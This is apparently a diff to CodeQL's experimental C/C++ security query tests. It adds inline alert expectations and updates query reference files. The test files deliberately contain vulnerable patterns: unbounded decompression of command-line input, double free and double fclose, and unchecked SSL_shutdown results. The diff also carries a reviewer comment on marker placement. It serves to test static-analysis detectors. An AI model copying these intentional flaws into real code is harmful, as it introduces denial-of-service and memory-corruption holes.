@@ -1,3 +1,17 @@ +#select +| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | +| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | +| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | +| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | +| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | +| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | +| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... 
| The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | +| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | +| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | +| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | +| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | +| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | edges | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:15:41:15:44 | **argv | provenance | | | brotliTest.cpp:15:41:15:44 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | provenance | | 
@@ -214,17 +228,3 @@ subpaths | zlibTest.cpp:83:19:83:25 | *access to array | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:16:26:16:30 | *input | zlibTest.cpp:83:19:83:25 | UnsafeInflate output argument | | zlibTest.cpp:84:18:84:24 | *access to array | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:37:25:37:32 | *fileName | zlibTest.cpp:84:18:84:24 | UnsafeGzread output argument | | zlibTest.cpp:85:19:85:25 | *access to array | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:71:26:71:30 | *input | zlibTest.cpp:85:19:85:25 | InflateString output argument | -#select -| brotliTest.cpp:18:35:18:53 | *access to array | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:18:35:18:53 | *access to array | The decompression output of $@ is not limited | brotliTest.cpp:18:5:18:27 | call to BrotliDecoderDecompress | BrotliDecoderDecompress | -| brotliTest.cpp:24:51:24:58 | **& ... | main.cpp:7:33:7:36 | **argv | brotliTest.cpp:24:51:24:58 | **& ... | The decompression output of $@ is not limited | brotliTest.cpp:24:5:24:33 | call to BrotliDecoderDecompressStream | BrotliDecoderDecompressStream | -| libarchiveTests.cpp:22:41:22:42 | *ar | main.cpp:7:33:7:36 | **argv | libarchiveTests.cpp:22:41:22:42 | *ar | The decompression output of $@ is not limited | libarchiveTests.cpp:22:17:22:39 | call to archive_read_data_block | archive_read_data_block | -| minizipTest.cpp:17:52:17:67 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:17:52:17:67 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:17:22:17:38 | call to mz_zip_entry_read | mz_zip_entry_read | -| minizipTest.cpp:26:30:26:39 | **zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | **zip_reader | The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:26:30:26:39 | *zip_reader | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:26:30:26:39 | *zip_reader | 
The decompression output of $@ is not limited | minizipTest.cpp:26:5:26:28 | call to mz_zip_reader_entry_save | mz_zip_reader_entry_save | -| minizipTest.cpp:28:13:28:19 | *access to array | main.cpp:7:33:7:36 | **argv | minizipTest.cpp:28:13:28:19 | *access to array | The decompression output of $@ is not limited | minizipTest.cpp:28:5:28:11 | call to UnzOpen | UnzOpen | -| zlibTest.cpp:25:13:25:22 | & ... | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:25:13:25:22 | & ... | The decompression output of $@ is not limited | zlibTest.cpp:25:5:25:11 | call to inflate | inflate | -| zlibTest.cpp:41:20:41:26 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:41:20:41:26 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:41:13:41:18 | call to gzread | gzread | -| zlibTest.cpp:51:38:51:44 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:51:38:51:44 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:51:14:51:20 | call to gzfread | gzfread | -| zlibTest.cpp:62:25:62:31 | inFileZ | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:62:25:62:31 | inFileZ | The decompression output of $@ is not limited | zlibTest.cpp:62:18:62:23 | call to gzgets | gzgets | -| zlibTest.cpp:77:45:77:59 | *input | main.cpp:7:33:7:36 | **argv | zlibTest.cpp:77:45:77:59 | *input | The decompression output of $@ is not limited | zlibTest.cpp:77:5:77:14 | call to uncompress | uncompress | -| zstdTest.cpp:39:69:39:74 | & ... | main.cpp:7:33:7:36 | **argv | zstdTest.cpp:39:69:39:74 | & ... | The decompression output of $@ is not limited | zstdTest.cpp:39:32:39:52 | call to ZSTD_decompressStream | ZSTD_decompressStream | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref index 3dcbc9db9ff4..b5c3a8e483da 100644 
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/DecompressionBombs.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-409/DecompressionBombs.ql +query: experimental/Security/CWE/CWE-409/DecompressionBombs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp index 902749434736..649373d326dc 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/brotliTest.cpp @@ -15,12 +15,12 @@ BrotliDecoderResult BrotliDecoderDecompressStream( void brotli_test(int argc, const char **argv) { uint8_t output[1024]; size_t output_size = sizeof(output); - BrotliDecoderDecompress(1024, (uint8_t *) argv[2], &output_size, output); // BAD + BrotliDecoderDecompress(1024, (uint8_t *) argv[2], &output_size, output); // BAD // $ Alert size_t input_size = 1024; const uint8_t *input_p = (const uint8_t*)argv[2]; uint8_t *output_p = output; size_t out_size; - BrotliDecoderDecompressStream(0, &input_size, &input_p, &output_size, // BAD + BrotliDecoderDecompressStream(0, &input_size, &input_p, &output_size, // BAD // $ Alert &output_p, &out_size); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp index 5988c9d0fc5e..9b8dfe194096 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/libarchiveTests.cpp 
@@ -19,7 +19,7 @@ static int read_data(archive *ar) { size_t size; la_int64_t offset; - int r = archive_read_data_block(ar, &buff, &size, &offset); // BAD + int r = archive_read_data_block(ar, &buff, &size, &offset); // BAD // $ Alert if (r == ARCHIVE_EOF) return ARCHIVE_OK; if (r < ARCHIVE_OK) diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp index 47f76ff079ba..f890ba397a97 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/main.cpp @@ -4,7 +4,7 @@ void minizip_test(int argc, const char **argv); void zlib_test(int argc, const char **argv); void zstd_test(int argc, const char **argv); -int main(int argc, const char **argv) { +int main(int argc, const char **argv) { // $ Source brotli_test(argc, argv); libarchive_test(argc, argv); minizip_test(argc, argv); diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp index 636f579feea7..b69eb27a3d78 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/minizipTest.cpp @@ -14,7 +14,7 @@ void minizip_test(int argc, const char **argv) { int32_t bytes_read; char buf[4096]; while(true) { - bytes_read = mz_zip_entry_read(zip_handle, (char *) argv[1], sizeof(buf)); // BAD + bytes_read = mz_zip_entry_read(zip_handle, (char *) argv[1], sizeof(buf)); // BAD // $ Alert if (bytes_read <= 0) { break; } 
@@ -23,7 +23,7 @@ void minizip_test(int argc, const char **argv) { void *zip_reader = mz_zip_reader_create(); mz_zip_reader_open_file(zip_reader, argv[1]); mz_zip_reader_goto_first_entry(zip_reader); - mz_zip_reader_entry_save(zip_reader, 0, 0); // BAD + mz_zip_reader_entry_save(zip_reader, 0, 0); // BAD // $ Alert - UnzOpen(argv[3]); // BAD + UnzOpen(argv[3]); // BAD // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp index 7643a607407b..bb2df6e1d349 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zlibTest.cpp @@ -22,7 +22,7 @@ void UnsafeInflate(char *input) { infstream.next_out = output; // output char array inflateInit(&infstream); - inflate(&infstream, 0); // BAD + inflate(&infstream, 0); // BAD // $ Alert } @@ -38,7 +38,7 @@ void UnsafeGzread(char *fileName) { gzFile inFileZ = gzopen(fileName, "rb"); unsigned char unzipBuffer[8192]; while (true) { - if (gzread(inFileZ, unzipBuffer, 8192) <= 0) { // BAD + if (gzread(inFileZ, unzipBuffer, 8192) <= 0) { // BAD // $ Alert break; } } @@ -48,7 +48,7 @@ void UnsafeGzfread(char *fileName) { gzFile inFileZ = gzopen(fileName, "rb"); while (true) { char buffer[1000]; - if (!gzfread(buffer, 999, 1, inFileZ)) { // BAD + if (!gzfread(buffer, 999, 1, inFileZ)) { // BAD // $ Alert break; } } @@ -59,7 +59,7 @@ void UnsafeGzgets(char *fileName) { char *buffer = new char[4000000000]; char *result; while (true) { - result = gzgets(inFileZ, buffer, 1000000000); // BAD + result = gzgets(inFileZ, buffer, 1000000000); // BAD // $ Alert if (result == nullptr) { break; } 
@@ -74,7 +74,7 @@ void InflateString(char *input) { uLong source_length = 500; uLong destination_length = sizeof(output); - uncompress(output, &destination_length, (Bytef *) input, source_length); // BAD + uncompress(output, &destination_length, (Bytef *) input, source_length); // BAD // $ Alert } void zlib_test(int argc, char **argv) { diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp index 42455185823c..8fa15ee39b6f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-409/DecompressionBombs/zstdTest.cpp @@ -36,7 +36,7 @@ void zstd_test(int argc, const char **argv) { ZSTD_inBuffer input = {buffIn, read, 0}; while (input.pos < input.size) { ZSTD_outBuffer output = {buffOut, buffOutSize, 0}; - size_t const ret = ZSTD_decompressStream(dctx, &output, &input); // BAD + size_t const ret = ZSTD_decompressStream(dctx, &output, &input); // BAD // $ Alert CHECK_ZSTD(ret); } } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref index 242beb593f8a..c6f509403283 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/DoubleFree.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-415/DoubleFree.ql +query: experimental/Security/CWE/CWE-415/DoubleFree.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c index 1c154c03094c..85130e5971ea 100644 
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-415/semmle/tests/test.c @@ -8,14 +8,14 @@ void workFunction_0(char *s) { char *buf; buf = (char *) malloc(intSize); free(buf); // GOOD - if(buf) free(buf); // BAD + if(buf) free(buf); // BAD // $ Alert } void workFunction_1(char *s) { int intSize = 10; char *buf; buf = (char *) malloc(intSize); free(buf); // GOOD - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_2(char *s) { int intSize = 10; @@ -54,7 +54,7 @@ void workFunction_5(char *s, int intFlag) { if(intFlag) { free(buf); // GOOD } - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_6(char *s, int intFlag) { int intSize = 10; @@ -75,7 +75,7 @@ void workFunction_7(char *s) { char *buf1; buf = (char *) malloc(intSize); buf1 = (char *) realloc(buf,intSize*4); - free(buf); // BAD + free(buf); // BAD // $ Alert } void workFunction_8(char *s) { int intSize = 10; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref index c67adb8774be..5a285aaa56ca 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/DangerousUseOfExceptionBlocks.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql +query: experimental/Security/CWE/CWE-476/DangerousUseOfExceptionBlocks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp index de0be1efff25..9d7478548fd2 100644 
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-476/semmle/tests/test.cpp @@ -68,7 +68,7 @@ void funcWork1b() { } delete [] bufMyData; - } + } // $ Alert } void funcWork1() { @@ -97,7 +97,7 @@ void funcWork1() { } delete [] bufMyData; - } + } // $ Alert } void funcWork2() { @@ -125,7 +125,7 @@ void funcWork2() { } delete [] bufMyData; - } + } // $ Alert } void funcWork3() { int a; @@ -148,7 +148,7 @@ void funcWork3() { } delete [] bufMyData; - } + } // $ Alert } @@ -180,7 +180,7 @@ void funcWork4b() { catch (...) { delete valData; // BAD - } + } // $ Alert } void funcWork5() { int a; @@ -218,7 +218,7 @@ void funcWork5b() { catch (...) { delete valData; // BAD - } + } // $ Alert } void funcWork6() { int a; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref index b16a5e484a60..aeadfbd0d1aa 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/FindIncorrectlyUsedSwitch.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql +query: experimental/Security/CWE/CWE-561/FindIncorrectlyUsedSwitch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c index ede4b87d249e..ecb421991a4c 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-561/semmle/tests/test.c @@ -25,7 +25,7 @@ void testFunction(char c1,int i1) case 9: break; dafault: - } + } // $ Alert switch(c1){ // BAD c1=c1*2; 
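Review bot: The expectations in funcWork1b through funcWork5b are attached to a closing brace (`} // $ Alert`), while the only rationale visible in the hunks is the `// BAD` on `delete valData;` one line above in funcWork4b and funcWork5b. So the marker and the annotation disagree on which line is at fault, and the funcWork1b to funcWork3 hunks show no `// BAD` at all. If the query reports the enclosing block, a comment line above each brace such as `// alert is reported on the enclosing block, hence the expectation on its closing brace` would say so. The same pattern appears in the switch hunks of CWE-561 test.c, where `// BAD` is on the `switch(c1){` line and `$ Alert` on its closing brace. The function bodies start outside the hunks.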
@@ -35,7 +35,7 @@ void testFunction(char c1,int i1) break; case 9: break; - } + } // $ Alert if((c1<6)&&(c1>0)) switch(c1){ // BAD @@ -47,7 +47,7 @@ void testFunction(char c1,int i1) break; case 1: break; - } + } // $ Alert if((c1<6)&&(c1>0)) switch(c1){ // BAD @@ -55,6 +55,6 @@ void testFunction(char c1,int i1) break; case 1: break; - } + } // $ Alert } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref index 0c2096f68ff8..ee351aa3cfb9 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/DangerousUseSSL_shutdown.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql +query: experimental/Security/CWE/CWE-670/DangerousUseSSL_shutdown.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp index 9ebe1cc10a53..ce550684d087 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-670/semmle/tests/test.cpp @@ -42,7 +42,7 @@ int gootTest2(SSL *ssl) int badTest1(SSL *ssl) { int ret; - switch ((ret = SSL_shutdown(ssl))) { + switch ((ret = SSL_shutdown(ssl))) { // $ Alert case 1: break; case 0: @@ -58,7 +58,7 @@ int badTest1(SSL *ssl) int badTest2(SSL *ssl) { int ret; - ret = SSL_shutdown(ssl); + ret = SSL_shutdown(ssl); // $ Alert switch (ret) { case 1: break; 
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref index 3edd226abaa9..7d28602c7e9f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/DoubleRelease.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-675/DoubleRelease.ql \ No newline at end of file +query: experimental/Security/CWE/CWE-675/DoubleRelease.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp index 986a95b1ce96..143572b34c28 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-675/semmle/tests/test.cpp @@ -17,7 +17,7 @@ void test2() FILE *f; f = fopen("myFile.txt", "wt"); - fclose(f); // BAD + fclose(f); // BAD // $ Alert fclose(f); } @@ -28,14 +28,14 @@ void test3() f = fopen("myFile.txt", "wt"); g = f; - fclose(f); // BAD + fclose(f); // BAD // $ Alert fclose(g); } int fGtest4_1() { fe = fopen("myFile.txt", "wt"); - fclose(fe); // BAD + fclose(fe); // BAD // $ Alert return -1; } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref index 496d5f1b7be6..50143aaec229 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementAfterRefactoringTheCode.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql
+query: experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementAfterRefactoringTheCode.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref
index 9bf28db3c8a8..2e5848da6d23 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/InsufficientControlFlowManagementWhenUsingBitOperations.qlref
@@ -1 +1,2 @@
-experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql
+query: experimental/Security/CWE/CWE-691/InsufficientControlFlowManagementWhenUsingBitOperations.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c
index 1f41f499dede..58c687d53005 100644
--- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-691/semmle/tests/test.c
@@ -5,25 +5,25 @@ void workFunction_0(char *s) { int intSize; char buf[80]; if(intSize>0 && intSize<80 && memset(buf,0,intSize)) return; // GOOD - if(intSize>0 & intSize<80 & memset(buf,0,intSize)) return; // BAD + if(intSize>0 & intSize<80 & memset(buf,0,intSize)) return; // BAD // $ Alert[cpp/errors-when-using-bit-operations] if(intSize>0 && tmpFunction()) return; - if(intSize<0 & tmpFunction()) return; // BAD + if(intSize<0 & tmpFunction()) return; // BAD // $ Alert[cpp/errors-when-using-bit-operations] } void workFunction_1(char *s) { int intA,intB; - if(intA + intB) return; // BAD + if(intA + intB) return; // BAD // $ Alert[cpp/errors-after-refactoring] if(intA + intB>4) return; // GOOD - if(intA>0 && (intA + intB)) return; // BAD + if(intA>0 && (intA + intB)) return; // BAD // $ Alert[cpp/errors-after-refactoring] while(intA>0) { if(intB - intA<10) break; intA--; - }while(intA>0); // BAD + }while(intA>0); // BAD // $ Alert[cpp/errors-after-refactoring] for(intA=100; intA>0; intA--) { if(intB - intA<10) break; - }while(intA>0); // BAD + }while(intA>0); // BAD // $ Alert[cpp/errors-after-refactoring] while(intA>0) { if(intB - intA<10) break; diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref index 85ac9ad2fd43..5dbfe0957a7b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/FindIncorrectlyUsedExceptions.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql +query: experimental/Security/CWE/CWE-703/FindIncorrectlyUsedExceptions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp index f255aabbb422..303728e97317 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-703/semmle/tests/test.cpp @@ -32,13 +32,13 @@ void funcTest2() void funcTest3() { - std::runtime_error("msg error"); // BAD + std::runtime_error("msg error"); // BAD // $ Alert throw std::runtime_error("msg error"); // GOOD } void TestFunc() { - funcTest1(); - DllMain(); + funcTest1(); // $ Alert + DllMain(); // $ Alert funcTest2(); } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref index f0cb9dd57c1e..1bc37310f275 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/ImproperCheckReturnValueScanf.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql +query: experimental/Security/CWE/CWE-754/ImproperCheckReturnValueScanf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp index b9608b757b9c..749dc9bdc676 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-754/semmle/tests/test.cpp 
